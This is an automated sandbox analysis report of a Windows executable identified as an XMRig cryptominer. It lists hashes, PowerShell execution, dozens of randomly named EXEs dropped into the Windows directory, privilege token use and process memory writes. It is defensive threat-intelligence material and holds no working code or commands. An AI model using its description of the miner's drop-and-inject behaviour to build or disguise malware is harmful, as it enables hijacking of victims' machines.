Malware Analysis Report

2024-11-16 11:23

Sample ID 240612-lfxhjsxdrl
Target 2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe
SHA256 9587e8ad64a0592b2f2b3c8e4d633c6ef741a5e34f5f5fd042460cb5ae52783b
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9587e8ad64a0592b2f2b3c8e4d633c6ef741a5e34f5f5fd042460cb5ae52783b

Threat Level: Known bad

The file 2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

xmrig

XMRig Miner payload

Xmrig family

XMRig Miner payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Executes dropped EXE

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-12 09:29

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 09:29

Reported

2024-06-12 09:31

Platform

win7-20240611-en

Max time kernel

124s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\irSRCkL.exe N/A
N/A N/A C:\Windows\System\kkKFWJp.exe N/A
N/A N/A C:\Windows\System\TYvDrPt.exe N/A
N/A N/A C:\Windows\System\XdrViiL.exe N/A
N/A N/A C:\Windows\System\mchSqxr.exe N/A
N/A N/A C:\Windows\System\rkFFehA.exe N/A
N/A N/A C:\Windows\System\CuRUnIK.exe N/A
N/A N/A C:\Windows\System\NPLFdly.exe N/A
N/A N/A C:\Windows\System\VQnuaGj.exe N/A
N/A N/A C:\Windows\System\BxJvwKu.exe N/A
N/A N/A C:\Windows\System\TncckMg.exe N/A
N/A N/A C:\Windows\System\ebiekAd.exe N/A
N/A N/A C:\Windows\System\RMAwFgU.exe N/A
N/A N/A C:\Windows\System\pGXFpyC.exe N/A
N/A N/A C:\Windows\System\JfFVnfF.exe N/A
N/A N/A C:\Windows\System\aVFcnyx.exe N/A
N/A N/A C:\Windows\System\sqWcnnc.exe N/A
N/A N/A C:\Windows\System\OQkXzmm.exe N/A
N/A N/A C:\Windows\System\pADMXKh.exe N/A
N/A N/A C:\Windows\System\dplevKF.exe N/A
N/A N/A C:\Windows\System\ryQIKFq.exe N/A
N/A N/A C:\Windows\System\majNrhl.exe N/A
N/A N/A C:\Windows\System\sbwTaeW.exe N/A
N/A N/A C:\Windows\System\bxkijDZ.exe N/A
N/A N/A C:\Windows\System\eeZfpMp.exe N/A
N/A N/A C:\Windows\System\JnwJCYH.exe N/A
N/A N/A C:\Windows\System\WxGwdfq.exe N/A
N/A N/A C:\Windows\System\liODnOH.exe N/A
N/A N/A C:\Windows\System\kuuepro.exe N/A
N/A N/A C:\Windows\System\xhXLLut.exe N/A
N/A N/A C:\Windows\System\Gxsseuv.exe N/A
N/A N/A C:\Windows\System\PIhcqMP.exe N/A
N/A N/A C:\Windows\System\LnEgeUm.exe N/A
N/A N/A C:\Windows\System\ZmoKKfH.exe N/A
N/A N/A C:\Windows\System\oTLUaYN.exe N/A
N/A N/A C:\Windows\System\bHGOUeO.exe N/A
N/A N/A C:\Windows\System\ahtQkPX.exe N/A
N/A N/A C:\Windows\System\mDcJPag.exe N/A
N/A N/A C:\Windows\System\aCcPrkz.exe N/A
N/A N/A C:\Windows\System\wrqmKYz.exe N/A
N/A N/A C:\Windows\System\HsOYbyu.exe N/A
N/A N/A C:\Windows\System\aUbeICP.exe N/A
N/A N/A C:\Windows\System\nhTXWCw.exe N/A
N/A N/A C:\Windows\System\zPNvpZe.exe N/A
N/A N/A C:\Windows\System\rnRCeLL.exe N/A
N/A N/A C:\Windows\System\WRAfFid.exe N/A
N/A N/A C:\Windows\System\OAcwhTd.exe N/A
N/A N/A C:\Windows\System\SsviGFt.exe N/A
N/A N/A C:\Windows\System\qzksbyc.exe N/A
N/A N/A C:\Windows\System\vqUufeT.exe N/A
N/A N/A C:\Windows\System\dknIswX.exe N/A
N/A N/A C:\Windows\System\tRfMKio.exe N/A
N/A N/A C:\Windows\System\eUvdTbq.exe N/A
N/A N/A C:\Windows\System\zaScrLw.exe N/A
N/A N/A C:\Windows\System\JdWkcQK.exe N/A
N/A N/A C:\Windows\System\MaMoEyW.exe N/A
N/A N/A C:\Windows\System\XMXEloq.exe N/A
N/A N/A C:\Windows\System\ByCEPcn.exe N/A
N/A N/A C:\Windows\System\ZSvNwUh.exe N/A
N/A N/A C:\Windows\System\nDHXLJE.exe N/A
N/A N/A C:\Windows\System\amzQjxW.exe N/A
N/A N/A C:\Windows\System\QweITiU.exe N/A
N/A N/A C:\Windows\System\jyPJZSa.exe N/A
N/A N/A C:\Windows\System\dyVhjhJ.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\iBpZRNE.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\eqcasEl.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\zpqNAtJ.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\OQkXzmm.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\WWbAjtV.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\rUEzLyq.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\YUCPxcn.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\NDABwHA.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\wrYtJVg.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\MNfNVgz.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\hlbHRYL.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\liODnOH.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\nDHXLJE.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\cmWXsRf.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\KsuNhWx.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\IUAzLdw.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\fJahKkx.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\wHaGMnm.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\FbbEEnR.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\gRFXWyf.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\yQRTKLZ.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\LJmOyAe.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\PyoZbwT.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\jwTJpsH.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\ORTJukm.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\XWjKbvC.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\uszcQiX.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\ElMpboy.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\gqSyOAD.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\ehoFiiB.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\NIpFOWw.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\dplevKF.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\lXvTzTN.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\NQmVCgJ.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\JgNBTXb.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\hADgShI.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\uahHNyJ.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\hxFjPNh.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\sddpifK.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\wQIpqlf.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\iiYsirl.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\YFjqLem.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\gngxxDQ.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\wUXQkdu.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\gppClXZ.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\ktqxsmZ.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\BbzOAVK.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\iwWvivH.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\ePKoQBq.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\sebjuGQ.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\HvOoARC.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\xbfRpOO.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\WUtHQVm.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\Wajprfc.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\XCJfWFH.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\PGTvNla.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\HOrvxty.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\GznmLWo.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\zdKLFpr.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\SuSCnfR.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\gdxpjbS.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\ocrjCmy.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\RTvBQmx.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
File created C:\Windows\System\kxsyGOf.exe C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2948 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
